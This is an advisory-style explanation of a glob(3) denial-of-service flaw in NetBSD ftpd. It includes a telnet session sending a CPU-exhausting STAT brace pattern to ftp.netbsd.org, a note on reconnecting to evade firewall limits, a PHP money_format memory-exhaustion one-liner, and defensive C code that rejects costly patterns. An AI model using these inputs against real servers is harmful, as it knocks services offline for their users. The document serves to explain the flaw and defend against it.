SecurityReason published the fully documented explanation, but let's look at an example first:
> telnet ftp.netbsd.org 21
Trying 204.152.190.15…
Connected to ftp.netbsd.org.
Escape character is '^]'.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
331 Guest login ok, type your name as password.
pass anon@cxib
230-
The NetBSD Project FTP Server located in Redwood City, CA, USA
…
230-
EXPORT NOTICE
…
230 Guest login ok, access restrictions apply.
stat
{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}
/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx
This request drives the ftpd process to 100% CPU for a long time: ftpd enters glob(3) and does not return quickly. A very similar symptom was described in the vulnerability for glibc strfmon(3):
-- http://securityreason.com/achievement_securityalert/67 --
…
Interestingly, PHP's memory_limit has no control over what happens at the libc level. The function strfmon(3) can allocate a lot of memory without being subject to PHP's memory_limit.
For example:
php -r 'money_format("%.1343741821i",1);'
will allocate ~1049MB of real memory, while memory_limit can be set lower than 1049M.
…
-- http://securityreason.com/achievement_securityalert/67 --
ftpd likewise does not control what happens in libc, so it is enough to send
--
USER anonymous
PASS
STAT */..[calculated pattern]
--
then disconnect and connect again (bypassing firewall limits). In PHP we can likewise bypass max_memory_limit through libc vulnerabilities.
Attacking a machine in this way can trigger various side effects.
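The defensive counterpart to the STAT pattern shown above is to bound the work a user-supplied pattern can cause before it ever reaches glob(3). The following is an added example, not code from NetBSD ftpd or libc: it scores a pattern by its brace expansions and wildcard path components and refuses it above hypothetical limits (MAX_EXPANSIONS, MAX_WILD_SEGMENTS are assumed policy values). It assumes brace groups are not nested, as in the pattern on this page; nested or unbalanced braces are rejected outright.

```c
/* Added example, not code from NetBSD ftpd or libc: estimate how much work a
 * user-supplied glob(3) pattern implies and refuse pathological patterns before
 * calling glob(). Assumes brace groups are not nested (true of the pattern
 * quoted above); nested or unbalanced braces are rejected outright. */
#include <limits.h>

#define MAX_EXPANSIONS    256  /* hypothetical policy: brace expansions per request */
#define MAX_WILD_SEGMENTS 4    /* hypothetical policy: path components with '*' or '?' */

struct glob_cost {
    unsigned long expansions;  /* product of alternative counts over all {a,b,c} groups */
    unsigned wild_segments;    /* path components glob() must scan with readdir(3) */
};

/* Single pass over the pattern; returns 0 on success, -1 on malformed braces. */
int glob_cost(const char *pat, struct glob_cost *out)
{
    unsigned long total = 1;
    unsigned alts = 0, wild = 0;
    int in_brace = 0, seg_wild = 0;
    for (const char *p = pat; *p; p++) {
        if (*p == '{') {
            if (in_brace) return -1;                       /* nested: out of scope */
            in_brace = 1; alts = 1;
        } else if (*p == ',' && in_brace) {
            alts++;
        } else if (*p == '}') {
            if (!in_brace) return -1;
            in_brace = 0;
            total = (total > ULONG_MAX / alts) ? ULONG_MAX : total * alts;  /* saturate */
        } else if (*p == '*' || *p == '?') {
            seg_wild = 1;
        } else if (*p == '/') {
            wild += seg_wild; seg_wild = 0;
        }
    }
    if (in_brace) return -1;
    out->expansions = total;
    out->wild_segments = wild + seg_wild;  /* the final component counts too */
    return 0;
}

/* 1 = safe to hand to glob(3), 0 = refuse the request up front. */
int glob_pattern_ok(const char *pat)
{
    struct glob_cost c;
    if (glob_cost(pat, &c) != 0) return 0;
    return c.expansions <= MAX_EXPANSIONS && c.wild_segments <= MAX_WILD_SEGMENTS;
}
```

For the pattern quoted above, glob_cost() reports 3^11 = 177147 brace expansions spread over 11 wildcard components, so glob_pattern_ok() refuses it, while an ordinary request such as pub/NetBSD-*/README passes.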